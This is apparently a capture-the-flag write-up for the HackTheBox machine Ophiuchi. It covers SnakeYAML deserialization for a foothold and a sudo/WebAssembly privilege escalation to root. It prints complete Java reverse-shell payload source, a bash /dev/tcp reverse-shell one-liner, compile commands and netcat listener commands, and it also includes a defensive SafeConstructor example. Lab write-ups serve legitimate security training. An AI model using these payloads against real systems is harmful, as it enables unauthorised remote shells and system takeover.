HTB Ophiuchi

Writeup for Ophiuchi box on HackTheBox.eu

Initial Enumeration

Initial port scan shows port 22 and 8080

The webpage shows a YAML parser form.

Capturing the request in Burp, we can change the POST data to deliver the exploit payload.

(Screenshot: Burp YAML exploit request)

Initial foothold

The yaml-payload.jar is compiled from the following code (based on artsploit's yaml-payload):

https://github.com/artsploit/yaml-payload

https://medium.com/@swapneildash/snakeyaml-deserilization-exploited-b4a2c5ac0858

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
import java.net.Socket;
import java.io.InputStream;
import java.io.OutputStream;
import java.lang.*;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            String host="10.10.14.82";
            int port=4444;
            String cmd="/bin/bash";
            Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
            Socket s=new Socket(host,port);
            InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
            OutputStream po=p.getOutputStream(),so=s.getOutputStream();
            // Pump bytes between the process and the socket until either side closes
            while (!s.isClosed()) {
                while (pi.available() > 0) so.write(pi.read());
                while (pe.available() > 0) so.write(pe.read());
                while (si.available() > 0) po.write(si.read());
                so.flush();
                po.flush();
                Thread.sleep(50);
                try {
                    p.exitValue();
                    break;
                } catch (Exception e) {
                }
            }
            p.destroy();
            s.close();
        } catch (IOException e) {
            e.printStackTrace();
        } catch(InterruptedException ee){
            ee.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

Compile

/usr/lib/jvm/jdk-11.0.10/bin/javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

Open a netcat listener on port 4444

ncat -nvlp 4444

Sending the YAML payload with the listener running gives us a shell back as the tomcat user.
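The root cause on the application side is that the form feeds user input to SnakeYAML's default constructor, which instantiates whatever class a `!!` tag names. The following is an added example (not code from the writeup or the yaml-payload project) showing that misuse next to the fix, using a harmless `java.net.URL` tag as a constructed stand-in for the real payload; it assumes the SnakeYAML 1.x API (in 2.x, SafeConstructor takes a LoaderOptions argument).

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class YamlParserDemo {

    // Constructed input: a benign class tag. The mechanism is the same as the
    // box's payload chain; the parser builds whatever class the document names.
    static final String DOC = "!!java.net.URL [\"http://example.invalid/\"]";

    // Vulnerable: new Yaml() uses Constructor, which honours arbitrary
    // "!!fully.qualified.Class" tags and invokes their constructors.
    static Object parseUnsafe(String doc) {
        return new Yaml().load(doc);
    }

    // Hardened: SafeConstructor only builds standard YAML types (maps, lists,
    // scalars) and throws a YAMLException on any unknown tag.
    static Object parseSafe(String doc) {
        return new Yaml(new SafeConstructor()).load(doc);
    }

    public static void main(String[] args) {
        Object o = parseUnsafe(DOC);
        // With the default constructor the result is a java.net.URL instance,
        // i.e. the document chose the class that got constructed.
        System.out.println("unsafe: built " + o.getClass().getName());

        try {
            parseSafe(DOC);
            System.out.println("safe:   unexpectedly accepted the tag");
        } catch (YAMLException e) {
            // SafeConstructor refuses the tag before any constructor runs.
            System.out.println("safe:   rejected -> " + e.getMessage());
        }
    }
}
```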

Checking the tomcat users file under /opt/tomcat/conf/tomcat-users.xml we find the admin password.

User flag

This allows us to su into admin.

User Enumeration

sudo -l shows we can run a Go program, /opt/wasm-functions/index.go, as root. It loads main.wasm and then executes deploy.sh.

sudo /usr/bin/go run /opt/wasm-functions/index.go

This suggests we need to compile our own WebAssembly module, which we do using Rust.

Using wasm-pack for Rust

File: src/lib.rs

// Exported without name mangling so the Go loader can call info() from main.wasm
#[no_mangle]
pub extern "C" fn info() -> i32 {
    1
}

File: Cargo.toml

[package]
name = "exploit"
version = "0.1.0"
authors = ["Your Name <[email protected]>"]
description = "A sample project with wasm-pack"
license = "MIT/Apache-2.0"
repository = "https://github.com/yourgithubusername/hello-wasm"
edition = "2018"

[lib]
crate-type = ["cdylib"]

[dependencies]
wasm-bindgen = "0.2"

File: deploy.sh

/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.36/8443 0>&1'

Open a netcat listener

ncat -nvlp 8443
wasm-pack build
scp pkg/exploit_bg.wasm admin@IP:/home/admin/main.wasm
scp deploy.sh admin@IP:/home/admin/deploy.sh

Root flag

Now ssh into the admin account and run the script as admin to get a root reverse shell. This must be run from the admin home directory, where main.wasm and deploy.sh are located.

sudo /usr/bin/go run /opt/wasm-functions/index.go

This opens a reverse shell to our machine on port 8443 as root.